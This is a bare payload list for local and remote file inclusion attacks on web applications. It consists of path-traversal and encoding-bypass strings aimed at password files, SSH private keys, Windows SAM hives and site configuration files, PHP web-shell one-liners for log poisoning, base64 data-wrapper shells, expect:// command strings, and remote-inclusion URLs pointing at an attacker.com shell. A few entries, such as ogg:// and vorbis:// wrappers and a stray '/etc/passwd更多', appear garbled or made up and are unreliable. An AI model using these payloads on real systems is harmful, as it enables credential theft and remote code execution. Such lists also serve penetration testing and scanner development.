# LFI/RFI Payloads - Comprehensive Collection
# Version: 1.0.17-20260301-Minggu-1738-WIB
# Category: Local File Inclusion / Remote File Inclusion

# ============================================
# BASIC LFI
# ============================================

/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/issue
/etc/motd
/etc/hostname

# Windows
C:\Windows\System32\config\SAM
C:\Windows\win.ini
C:\boot.ini
C:\autoexec.bat
C:\Windows\System32\drivers\etc\hosts

# ============================================
# PATH TRAVERSAL
# ============================================

../../../etc/passwd
../../etc/passwd
../etc/passwd
/etc/passwd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..//..//..//etc/passwd
..\/..\/..\/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e\%2e%2e\%2e%2e\etc\passwd

# ============================================
# NULL BYTE BYPASS
# ============================================

/etc/passwd%00
/etc/passwd%00.jpg
/etc/passwd%00.php
/etc/passwd%00.txt
/etc/passwd\x00.jpg

# ============================================
# DOUBLE URL ENCODING
# ============================================

%252e%252e%252fetc%252fpasswd
%252e%252e%255cetc%255cpasswd
%25c0%25ae%25c0%25ae%25c0%25afetc%25c0%25afpasswd

# ============================================
# BASE64 ENCODING
# ============================================

L3RjL3Bhc3N3ZA==

# ============================================
# WRAPPER PROTOCOLS
# ============================================

php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://input
php://fd/0
expect://id
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

# ============================================
# JAVA LFI
# ============================================

file:///etc/passwd
file:///C:/Windows/win.ini
file:///C:/boot.ini

# ============================================
# PYTHON LFI
# ============================================

../../../../../../../../etc/passwd
..\\..\\..\\..\\..\\..\\etc\\passwd

# ============================================
# SESSION FILES
# ============================================

/var/lib/php/sessions/sess_*
/tmp/sess_*
/var/tmp/sess_*
/tmp/php*
/var/log/apache2/access.log
/var/log/httpd/access.log

# ============================================
# LOG POISONING
# ============================================

<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php eval($_POST['cmd']); ?>
<?php passthru($_GET['cmd']); ?>

# User-Agent poisoning
<?php system($_SERVER['HTTP_USER_AGENT']); ?>
<?php phpinfo(); ?>

# ============================================
# RFI PAYLOADS
# ============================================

http://attacker.com/shell.txt
http://attacker.com/shell.php
https://attacker.com/shell.txt
ftp://attacker.com/shell.txt
\\attacker.com\share\shell.php

# PHP wrapper RFI
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpOyA/Pg==

# ============================================
# LOG FILES
# ============================================

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/syslog
/var/log/messages
/var/log/secure
/var/log/maillog

# ============================================
# CONFIG FILES
# ============================================

/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/configuration.php
/var/www/html/application/config/database.php

# ============================================
# SSH KEYS
# ============================================

/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/home/*/.ssh/authorized_keys

# ============================================
# ENVIRONMENT VARIABLES
# ============================================

/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/version
/proc/cmdline
/proc/meminfo
/proc/cpuinfo

# ============================================
# WINDOWS PATHS
# ============================================

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\sam
C:\Windows\repair\system
C:\boot.ini
C:\autoexec.bat
C:\config.sys

# Network paths
\\localhost\c$\Windows\System32\config\SAM
\\127.0.0.1\c$\Windows\win.ini

# ============================================
# ENCODED TRAVERSAL
# ============================================

..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd

# UTF-8 variations
%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd

# ============================================
# FILTER BYPASS
# ============================================

/etc/passwd/.
/etc/passwd../
/etc/passwd/./
/etc/passwd/./.
//etc/passwd
/etc//passwd
/etc/.../passwd
/etc/passwd更多

# ============================================
# PHP WRAPPERS
# ============================================

php://filter/convert.base64-encode/resource=index.php
php://filter/convert.iconv.UTF-8.UTF-16/resource=config.php
php://filter/string.toupper/resource=config.php
php://filter/string.rot13/resource=config.php
phar://./phar.zip/phar.php
zip://./phar.zip#phar.php

# ============================================
# EXPECT WRAPPER
# ============================================

expect://id
expect://whoami
expect://ls

# ============================================
# DATA WRAPPER
# ============================================

data:text/plain,<?php system($_GET['cmd']); ?>
data:text/html,<?php system($_GET['cmd']); ?>
data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

# ============================================
# GZIP WRAPPER
# ============================================

compress.zlib:///etc/passwd
compress.bzip2:///etc/passwd

# ============================================
# OGG/VORBIS WRAPPER
# ============================================

ogg://id
vorbis://id

# ============================================
# SUBVERSION
# ============================================

/.svn/entries
/.git/config

